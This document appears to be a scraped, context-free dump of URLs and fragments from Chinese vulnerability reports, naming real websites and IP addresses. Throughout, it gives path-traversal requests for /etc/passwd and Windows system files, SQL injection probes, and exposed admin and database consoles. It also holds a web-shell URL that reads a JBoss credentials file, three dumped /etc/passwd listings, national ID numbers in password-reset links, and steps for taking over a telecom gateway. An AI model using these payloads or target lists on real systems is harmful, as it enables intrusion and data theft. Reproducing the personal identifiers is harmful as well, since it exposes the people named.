http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=hnzbcg&webappcode=A08&templetid=1210753703820116 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=women&webappcode=A12&templetid=1370591279571221&userId=10002 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=portal&webappcode=A07&templetid=1413160234663065&userId=10002 http://bzkzs.ccut.edu.cn/ccgdzs/webdo/img/imglist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menubycid.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menulist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/article/articlelist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/article/onearticle.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/img/imglist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menubycid.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menulist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/student/studentlist.do https://**.**.**/por/login_psw.csp http://218.17.200.230/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash messagebus:x:100:101:User D-BUS:/var/run/dbus:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hal:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false gdm:x:50:104:Gnome daemon:/var/lib/gdm:/bin/false suse-ncc:x:102:105:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash wlgma:x:1000:1000::/home/wlgma:/bin/bash http://www.1218.com.cn/administrator.php/ http://192.168.0.250/administrator.php/common/login/index.php?back=http://192.168.0.250/administrator.php www.1218.com.cn域名就可以正常使用了。 http://www.1218.com.cn/administrator.php/common/login/index.php?back=http://192.168.0.250/administrator.php display:none administrator.php/common/login/check_login.php www.1218.com.cn http://www.acc.gov.cn/portal/skin/template/query/CPA_ACCT_PUNISHServlet?CPA_CNO=310000072984 http://cafe.testin.cn/?/ http://www.mtestin.com/feedback/info/1728 www.mtestin.com http://www.mtestin.com http://callcenter.dongfeng-nissan.com.cn/login.aspx http://ll800.go189.cn http://ll800.go189.cn/ll800/order/temp.ajax?path=../../../etc/passwd http://go189.cn/emall http://go189.cn/emall/emall/member/getPassWordResult.html?customerid=4028f4c44801bb0c01480c2aa99e002d&email=15312021313@189.cn http://go189.cn/emall/userManage/setCustomerPwd.do http://www.jjwxc.cn/ https://github.com/pku9104038/apkstore_server/blob/3d7239a72c75d09a38c585e2b3f875768b99ce45/conf/smtp_conf.xml https://github.com/710270532/python/blob/f7767caf603d27c665fef696e96dd07702e1e658/test.py http://app.dianmiaoshou.com/web/ http://www.wanda.cn/ http://www.mcqyy.com/RunCode/python/ http://219.143.252.250:8080/ http://221.181.13.16/login.action http://www.hnheyin.com/zjjl.aspx?lx=&st=&et= www.hnheyin.com https://github.com/rover0321/emailSender/blob/925c5cbd5feaa79275e5ef30a3e9d97cfb795fa9/email.properties www.jzjtgl.com/wap/browwordmessage.jspprogram_code=51 http://www.jjwxc.cn https://github.com/speckle/OA/blob/ed9a25dab21a1d8b83f6bc8832bc5d6b7e9c055a/protected/config/params.php http://cnfc.happyelements.com/site/login http://www.rd.uestc.edu.cn/index.php?c=about&id=17 http://zjl.chinapost.com.cn:80/servlet/MessageFileServlet?act=1&name=135791&t=1438755938685&snumber=1 www.insissue.com https://github.com/XiaoEDaiKuan/xiao-e-dai-kuan-site-app/blob/c01ecd983fbe117b34706f33a6d8a3cc09d8d778/src/main/resources/mail.properties http://ebs.chnzb.cn/ http://www.e-cinda.com http://lszds.lsz.gov.cn/ http://lszds.lsz.gov.cn/install/ab.php http://**.**.**.**/qcar/checkUser.do https://github.com/triompha/python_learn/blob/master/cir_mathion.py http://xinyong.rizhaocom.gov.cn http://xinyong.rizhaocom.gov.cn/install/test.php http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx www.xh99d.com https://**.**.**.**/huanggit/gidcloud/blob/0d3869618e78a9dd4d73cd5259b7e9ba940df3a1/src/main/resources/config.properties http://eyemain.znv.com/wq/login.action http://androidcn.fortuna.happyelements.cn/lua/200009.jsp?pw=1234qwer!&uid=1502902843 http://androidcn.fortuna.happyelements.cn/lua/error.jsp?redirect=%2Flua%2F200009.jsp http://61.178.81.162:8888/LQL_OA/login.aspx http://www.zhaoxincfu.com/index.php?user&q=login www.zhaoxincfu.com web.7k7k.com/games/huodong/touch/fzsjds2/show.php?id=622 http://www.jjwxc.cn/research/index http://hi.gtja.com/ http://hi.gtja.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.mangocity.com/index.php?d=search&c=search_controller&m=index&keyword=1 http://www.moneydai.com/Account/msgdetail?mid=1 http://www.moneydai.com/Account/msgdetail?mid=1 https://github.com/HurricaneTong/FDU_SMP/blob/105aff7874eeb1e1de50ed2ba62c7abce96881be/resources/config/mail.properties http://www.jjwxc.cn http://www.kuwo.cn/US/login.htm http://www.jjwxc.cn/admin/login/index http://images.wandafilm.com/phpmyadmin/setup/index.php?page=config http://images.wandafilm.com/phpmyadmin/setup/index.php http://103.255.94.36:9090/index.jsp https://**.**.**.**/ilovezy/cc-jqFileUpload/blob/88be79d955755c1e619703cb7063b0d9b11de8fa/server/php/files/%25E4%25BC%2581%25E4%25B8%259A%25E9%2582%25AE%25E7%25AE%25B1.txt http://**.**.**.**/ToolsMgr/ http://**.**.**.**:7006/DispatchServer/DispatchService.asmx http://**.**.**.**/Login soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**:7006/DispatchServer/DispatchService.asmx http://**.**.**.**/Login soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ http://jw.nankai.edu.cn/video.php?id=692 www.carwings-nissan.com.cn/index.php/News/index/nid/9 http://**.**.**.**/ http://**.**.**.**/aqqx/ http://**.**.**.**/pjbj/)使用的是同一款软件,在用户名处存在注入 http://**.**.**.**/aqqx/ http://58.61.160.7:8080/ http://www.ieg.ynu.edu.cn/admin/admin_login.asp http://mooninbox.com/order/seeOrderDetail.action?orderType=1&oid=73 http://14.17.109.153/weihui_admin/feedback/list http://14.17.109.153/weihui_admin/feedback/list http://14.17.109.153/weihui_admin/feedback/list http://www.thinksaas.cn/service/down/ http://otc.shisu.edu.cn/main/Showclass.asp?classID=46 http://zh.yilibabyclub.com/admin http://college.weimob.com/class.php?id=3 http://**.**.**.**/Comm/UploadFile/webUpload.aspx?AttId=x.cer&FilePath=/../web/ http://zyyd.media.open.com.cn/picexam/examshowpic_moni.asp?index_id=94&picid=@@version&od=3 DAV:sql Host:113.108.111.235 http://**.**.**.**/Front/content.aspx?typeid=6 http://**.**.**.**/Front/content.aspxtypeid=6%27%00and%00%271%27=%271 www2.baidu.com http://www.gtarsc.com/ http://www.gtarsc.com/Login/GetImage?key=../../../../../../../../../../windows/win.ini http://www.gtarsc.com/Login/GetImage?key=../../../../../../../../../../windows/System32/drivers/etc/hosts http://219.143.118.112:8080/YJZHCL/login.jsp www.cool170.com) http://wms.fday.co/account/login http://nx.gtja.com/ http://wooyun.org/bugs/wooyun-2010-0130601 http://210.14.78.115/ http://210.14.78.115/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55 http://218.28.13.73:7001/console http://218.28.13.73:7001/mytree http://m.tiexue.net/3G/Login.aspx这个是铁血网3G的登陆接口,可以看到没有任何限制策略 http://sbm.pumc.edu.cn http://sbm.pumc.edu.cn/Article_Shows.asp?photoid=276 URL:http://sbm.pumc.edu.cn/User_ChkLogin.asp URL:http://sbm.pumc.edu.cn/vote.asp http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283 http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283 http://**.**.**.**/list.jsp?col=0存在SQL注入漏洞 http://**.**.**.**/user/login.action http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003110001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003063001002&width=744&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002006009001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003102001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://202.115.194.254/phpmyadmin/ http://w.189.cn/login.jsp http://gw.imufe.edu.cn/gw/admin/ http://222.210.108.226:6101/CDLF/app_page/MainApp.html http://27.17.51.78:8400 http://www.nxyqs.com/ http://www.nxyqs.com/newexam/login.aspx http://**.**.**.**/bugs/wooyun-2010-044619 http://**.**.**.**/xmjs.aspx?id=10 http://alwayson.hp.com.cn/AAS/ http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=BJZC728851&id=1 http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=BJZC728831%27&id=1 http://www.skyworth-ea.com/install/ http://www.skyworth-ea.com/SysAdmin/Login.aspx http://www.skyworth-ea.com:80/cn/about/development.aspx?nodecode= http://www.skyworth-ea.com/cn/humanresource/employment.aspx http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=10000011734487 http://www.skyworth-ea.com/cn/product/index.aspx?nodecode=105007002 http://www.skyworth-ea.com/en/search.aspx?val=a http://www.skyworth-ea.com/en/product/category.aspx?nodecode=105012001003 http://www.skyworth-ea.com/en/news/newsdetail.aspx?id=100000030389525&nodecode=105011001 http://www.skyworth-ea.com/UploadFiles/main/Files/2015/8/20150805185555.aspx http://www.skyworth-ea.com/UploadFiles/main/Files/2015/8/20150805185438.aspx http://b2b.cits.com.cn/citsonlineWeb/online/messageBBS/openFile.jsp?&fileName=../../../../etc/passwd http://www.dfmg.com.cn/scn/NewsDetail.aspx?ID=3396 http://sso.pudong.gov.cn:5203/cas/login?service=http%3A%2F%2Fusercenter.pudong.gov.cn%2Fwebsite%2Fusercenter%2F http://mail.pudong.gov.cn:8080/owaloginweb/Default.aspx http://u.tm.gamebbs.renren.com/data/config.inc.bak URL:http://121.10.6.161:8080/jnjdbm/platform/login!login.action http://**.**.** exchanger:mx2.qiye.163.com exchanger:mx.qiye.163.com http://person.sac.net.cn/pages/retrievePassword/passwordreset.html?String=01&println=C20347&emi_paper_no2=31010919870930352X&template=10061154048 http://person.sac.net.cn/pages/retrievePassword/passwordreset.html?String=01&println=C08075&emi_paper_no2=339005198201081840&template=39908079 http://person.sac.net.cn http://www.csnjy.com/index.asp http://www.csnjy.com/about.asp?title=%D7%DC%BE%AD%C0%ED%D0%C2%C4%EA%D6%C2%B4%C7&id=224 http://www.csnjy.com/productshow.asp?id=193 http://www.csnjy.com/clture.asp?title=%B9%AB%CB%BE%B1%EA%CA%B6&id=32 http://www.csnjy.com/partioshow.asp?id=251&tb=edu&bigclassname=%B5%B3%BD%A8%B9%A4%D7%F7 http://www.csnjy.com/lawshow.asp?id=240&tb=dongtai&bigclassname=%B9%FA%BC%D2%B7%A8%B9%E67 http://www.csnjy.com/newshow.asp?id=440&tb=news&bigclassname=%D7%EE%D0%C2%B6%AF%CC%AC http://www.csnjy.com/videoshow.asp?id=145&tb=dongtai http://www.csnjy.com/cllist.asp?c=1 http://www.csnjy.com/cshow.asp?id=102&tb=brandproduct&c=1 http://www.csnjy.com/special.asp?bigclassname=%B0%B2%C8%AB%C9%FA%B2%FA&id=56 http://www.csnjy.com/news.asp?bigclassname=%D7%EE%D0%C2%B6%AF%CC%AC&id=60 http://www.csnjy.com/products.asp?bigclassname=%D0%A1%CA%B3%C6%B7%C0%E0&id=75 http://www.csnjy.com/partio_list.asp?bigclassname=%B5%B3%BD%A8%B9%A4%D7%F7 http://www.csnjy.com/law_list.asp?bigclassname=%B9%FA%BC%D2%B7%A8%B9%E6 http://**.**.**.**:8081 http://**.**.**.**/Supplier/UploadFile.aspx http://**.**.**.**/d.asp http://api.xgo.com.cn/vote_arrnew.php?voteid=82 http://search.10jqka.com.cn/diag/concept-detail?conceptId=300433 https://220.189.211.10/diag/concept-detail?conceptId=300433 http://s.10jqka.com.cn/diag/concept-detail?conceptId=300920 shop.ali213.com/getkey/old.html http://**.**.**.**/index/tender/indexTender!queryBulletinPage.do http://www.tofer.com.cn http://tofer.yili.com/ http://tofer.yili.com/admin http://waiyu.nchu.edu.cn/gk.asp?page=7&ajtype=jsfc http://v.higo.meilishuo.com/shop/Get_group_detail http://stores.**.**.**.**:8090/storesB2C/main.shtml http://**.**.**.**/zsdr/login.jsp http://www.chinaanhe.com/ http://121.40.166.230:10021/plugins/?q=area&area_id=-1 http://121.40.166.230:10021/?ask&status=%273 http://121.40.166.230:10021/index.php?user&q=code/borrow/gathering&status=0'&page= http://121.40.166.230:10021/creditshop/main.html?classid=&price=0,1000'&order= http://m.yaofangwang.com/app/Reset_mobile.aspx?mobile=18888888888 www.moneydai.com/Touzi/index/pt/我是注入点/qi/0/p/2.html http://www.chinaanhe.com/anli/index.html http://www.chuangjucf.com http://www.6scf.com http://www.dyk.com.cn/service/serviceacitivitieinto?id=10007 http://zc.testin.cn http://www.hddznet.com/ http://www.hddznet.com/performance-160-410.html http://mail.10jqka.com.cn:88/cgi-bin/test-cgi http://mx2.10jqka.com.cn:88/cgi-bin/test-cgi http://mx3.10jqka.com.cn:88/cgi-bin/test-cgi http://220.189.211.9:88/cgi-bin/test-cgi http://mx1.10jqka.com.cn:88/cgi-bin/test-cgi http://210.51.244.169:88/cgi-bin/test-cgi http://218.108.90.233:88/cgi-bin/test-cgi http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://person.sac.net.cn/pages/train/sg-train-teacher-login.html http://person.sac.net.cn/pages/train/train-line-register!search.action http://cmxy.gzmu.edu.cn/article_StudentWork.php?op=StudentWork&id=3591 http://cube.xialaile.cn http://admin.xialaile.cn https://www.yuancredit.com/cust/verifyCode http://pay.th010.com/ http://pay.th010.com http://www.chinaiiss.com/do.php?do=user&p1=getpass&uid=999900&id=83adSsKK6Y http://www.wanda.cn/ http://**.**.**.**/hykg//sys/Login_dologin.action http://**.**.**/js/ https://github.com/LyonWong/Framework-LY/blob/aea17fc85bc5667a9c7408c089d6c2b6933a658c/config/.conf/email.php http://wooyun.org/bugs/wooyun-2015-0129958,这些都是app的接口,其中一个应用是理邦微品,下载地址http://appshopper.com/lifestyle/%E7%90%86%E9%82%A6%E5%BE%AE%E5%93%81%E4%BC%9A,有官方下载地址,vpclub.cn下的,忘了在哪去了。。。 http://app.vpclub.cn/api/1.0/StoreServer/Store/GainCustomer http://**.**.**.**/ http://**.**.**.**/yonghu.html http://**.**.**.**/cp/glis90.html http://221.11.48.169:8080/yyoa/ http://bbs.dapu.com/ http://bbs.dapuhome.com/ http://mail.dapu.com/ http://ocs.dapu.com/ http://dapubaby.tmall.com http://www.cnrmall.com/,下个app注册 http://m.cnrmall.com/user/userinfo.jsp?userid=10500011 http://www.bcda.gov.cn/detail.asp?id=7036 http://**.**.**.**/admin/editor/Example/NewsSystem/NewsFile/20158511377158.asp http://**.**.**.**/MagazineBookList.aspx?typeid=4 http://oa.glsc.com.cn:10040/wps/portal http://adma.ustb.edu.cn/szdw.asp?fid=208&id=468 http://adma.ustb.edu.cn/szdw.asp?fid=208&id=468 http://sqlmap.org https://**.**.**.**/wayshall/onetwo/blob/dd9604f6251df5e14b080140f39eac0e3277757c/core/plugins/email/src/test/resources/email/mailconfig.properties http://asp.asus.com.cn/login.aspx http://222.73.192.46:8081/ http://222.73.192.46:8081/uploadTemp/ads1438861038189113272.PHP root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib64/im:/sbin/nologin ztsafe:x:0:0::/home/ztsafe:/bin/bash apache:x:500:500::/home/apache:/bin/bash mysql:x:501:501::/home/mysql:/bin/bash duduftp:x:500:500::/usr/local/apache2/:/sbin/nologin http://58.215.164.127/ http://58suyun.58.com/ http://tmsbj.century21cn.com:8010/Login.aspx http://tmsbj.century21cn.com:8010/instancedetail.aspx?instanceid=b11e032f-f225-4f59-9649-0509942658be&expandpath=&&pageaction=close&emp_cd=bj40458 http://tmsbj.century21cn.com:8010/TPM/CommissionConfirm/CommissionConfirmForm.aspx?Mode=View&WorkItemID=c98aa58e-b1af-4357-9387-216ee3b4b5d8&LoginName=&LoginPassword= http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=aeaf2788-ef5e-4b4f-9a1d-32522ce98859&ExpandPath=&&PageAction=Close http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=67d833ab-1395-4a78-b066-fc785cad256e&ExpandPath=&&PageAction=Close http://tmsbj.century21cn.com:8010/UploadFile/2014-05/BJB2663140505/80b3a2f8-33ae-4b21-b16c-b8708eabf679.pdf http://tmsbj.century21cn.com:8010/uploadfile/2014-01/bjb306140102/ee3e4047-b12d-4c90-9874-40ff17a7f964.pdf http://cs.sicnu.edu.cn/ http://cms.huazhu.com http://**.**.**/NanTian/ http://wooyun.org/bugs/wooyun-2015-0131339 https://29ab43d962**********c0480b3ed157687:x-oauth-basic@github.com/baixing/jucheshang_admin http://cartier.baixing.cn/pull.php更新到线上 http://www.cs12333.com:8080/cstykj/flex/Index.html www.chinaiiss.com http://**.**.**/ http://**.**.**/jxjs/ http://**.**.**/jxjs/wisjsp/feedback_yingluoshi_yy.jsp=343316&jigou_layer=3&shifouyyjl=3&ying_ls=ying_ls http://117.41.251.132/jxjs/wisjsp/public_show_manager_yy.jsp?feedbackid=200763&shifouyyjl=3&shifoumanager=shifoumanager http://117.41.251.133:8080/VillageReport/ http://**.**.**/VillageReport/byjyAction.domethod=selectDetailInfo&isEdit=0&shFlg=1&msgId=182104 http://58.251.8.107/m1/login.do http://www.unicomlabs.com/home.jsp android:configChanges="keyboardHidden|orientation android:exported="true android:launchMode="singleTop android:name=".ProductUsageShowActivity android:screenOrientation="portrait"/ http://**.**.**.**:9085/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= http://shyysh.spta.cn:8080/ http://**.**.**/app/modifyApp.actionappID=25 http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade&placeholder=1 http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade http://222.82.211.198:8082/index.php?s=/public/login http://mail.citicsinfo.com/ http://mail.citicsinfo.com/names.nsf http://221.10.101.85:8080/Default.aspx http://gamemanager.uqee.com/allOperFeedBack_10_1.html http://gamemanager.uqee.com/operator.html http://gamemanager.uqee.com/allOperFeedBack_10_1.html http://60.220.226.210:8080/ http://60.220.226.210:8080/LbDataBaseLoginTestPage.aspx http://url/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://app.homsee.com/againset_mima.aspx?deAcc=xxx http://app.homsee.com/admin/Mangermang/Main.aspx http://www.gzxbm.cn/001/ http://www.gzxbm.cn/002/ http://www.gzxbm.cn/003/ http://www.gzxbm.cn/004/ http://www.gzxbm.cn/010/ http://www.gzxbm.cn/001/page_main/att/AttAddFrm.jsp?AID=mail&DOCID=1&FLOWID=mail&TYPE=3 http://g.corp.gome.com.cn/mtms/login.do inurl:login_form.jsp http://**.**.**.**:8082/finance_hc/reports/upload_template.jsp http://sae.sina.com.cn/?m=apps&a=create http://drops.wooyun.org/papers/831 http://www.flyertea.com/credit/index.php/Index/index.html?condition=11-0&code=&name= http://58suyun.58.com/pc/suyun/orderdetail?orderid=629493083318403072 home.nsf/tomailsmart可直接进入管理后台 http://10.60.1.62/ http://10.60.3.6/ http://10.60.3.18/ http://10.60.1.125/zh_cn/ http://10.60.3.69/ http://10.60.18.100/ http://10.60.20.2/到http://10.60.20.72 http://10.60.3.243 http://10.60.21.35/ http://huawei.hiall.com.cn/ http://**.**.**.**/top/2015cimt/news_t_view.html?id=468516 http://**.**.**.**/top/2015cimt/news_t_view.html?id=468516 http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-057096 http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 https://202.202.32.77 http://tra.st119.org:8082/firefighting/loginAction!login.shtml http://221.2.233.10:8888/login.aspx http://100inn.cc/Passport/ForgetPassword.aspx http://**.**.**.**/bugs/wooyun-2010-0131319 http://ip/dlp/userReg/pushSetup.do?setupName=asdasd http://www2.cmu.edu.tw/~cmu4c/2010/review/detail.php?id=473 http://www.idoup.com/prepare/redirect.action存在命令执行 http://www.idoup.com/prepare/ http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770110785 http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111364 http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111384 http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111988 http://**.**.**.**/borrow/Child?pid=4 http://**.**.**.**/userTrade/changeConsultant?keyword= http://bus.gpsoo.net http://cmu4c.cmu.edu.tw/2011/review/detail.php?id=1159 http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=http://ww.baidu.com/link?url=6Mz79LQyCsoHrjnRijPYzHqjIwfGzkdAjaRShJTPLQMcglQGg22aa9Mz8ipfpftP&wd=&eqid=c1558f51000079ee0000000555c103aa http://58.250.171.39/zecmd/zecmd.jsp http://58.250.171.39/zecmd/zecmd.jsp?comment=cat%20+%2Fapp%2Fstud%2Fjboss-4.0.4.GA/server/default/conf/props/jmx-console-users.properties admin.php/website/check http://renshi.caas.net.cn/admin_login.asp http://renshi.caas.net.cn/Z_List.asp?ParentClassName=1 http://renshi.caas.net.cn/database/ http://**.**.**.** http://**.**.**.**/storefront/ou/findAddr.htm?id=460000052580966&_=1438918372562 http://**.**.**.**/storefront/ec/so/toOrderDetail.htm?soNo=2015080700586 inurl:cart.jsp?id= http://**.**.**.**/site/cart.jsp?uid=10036&id=aknp2928vc38jjul http://**.**.**.**/site/cart.jsp?uid=10036'&id=aknp2928vc38jjul http://**.**.**.**/500.jsp?message=java.lang.Exception%3A+java.lang.Exception%3A+com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException%3A+Unknown+column+%2710036%C3%A2%E2%82%AC%CB%9C%27+in+%27where+clause%27 http://www.flyertea.com/comment/Mobile/promotionSearch?bigtype_fid=&bigtype_id=141 http://dct.nctu.edu.tw/page.php?id=69 http://www.tuodong.com/hqms/indexAction!login.action http://www.tuodong.com/hqms_gx/indexAction!exit.action http://www.tuodong.com//bhz_jx/loginAction!userLogin.action http://www.tuodong.com//bhz_ly//loginAction!userLogin.action http://www.tuodong.com/bhz_wh/loginAction!userLogin.action http://www.tuodong.com/hqms_hn/indexAction!exit.action http://www.tuodong.com/hqms_sx/indexAction!login.action http://www.tuodong.com/tms_ly/loginAction!isLogin.action http://www.tuodong.com/tms_sc/loginAction!isLogin.action http://www.tuodong.com/td/IndexAction!indexLoad.action http://www.tuodong.com/td/qwe.jsp http://115.28.16.113:27000/loginAction root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash cri702:x:500:500::/alidata/home/cri702:/bin/bash cri703:x:501:501::/alidata/home/cri703:/bin/bash demo72:x:502:502::/alidata/home/demo72:/bin/bash gunai:x:503:503::/alidata/home/gunai:/bin/bash haiyangzhixing:x:504:504::/alidata/home/haiyangzhixing:/bin/bash huating:x:505:505::/alidata/home/huating:/bin/bash sale:x:506:506::/alidata/home/sale:/bin/bash xiaoshou:x:507:507::/alidata/home/xiaoshou:/bin/bash nginx:x:508:508::/alidata/home/nginx:/bin/bash tssvip:x:509:509::/alidata/home/tssvip:/bin/bash tss:x:510:510::/alidata/home/tss:/bin/bash salepms:x:511:511::/alidata/home/salepms:/bin/bash salekfgj:x:512:512::/alidata/home/salekfgj:/bin/bash shuijing:x:513:513::/alidata/home/shuijing:/bin/bash cri73:x:514:514::/alidata/home/cri73:/bin/bash futai:x:515:515::/alidata/home/futai:/bin/bash 